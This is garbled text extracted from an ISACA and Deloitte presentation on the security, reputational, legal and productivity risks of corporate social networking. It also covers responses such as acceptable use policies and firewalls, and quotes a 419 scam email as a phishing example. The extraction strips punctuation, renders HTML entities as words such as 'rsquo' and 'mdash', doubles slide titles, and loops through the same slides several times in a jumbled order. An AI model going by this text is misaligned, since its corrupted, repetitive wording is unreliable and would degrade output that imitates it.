mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
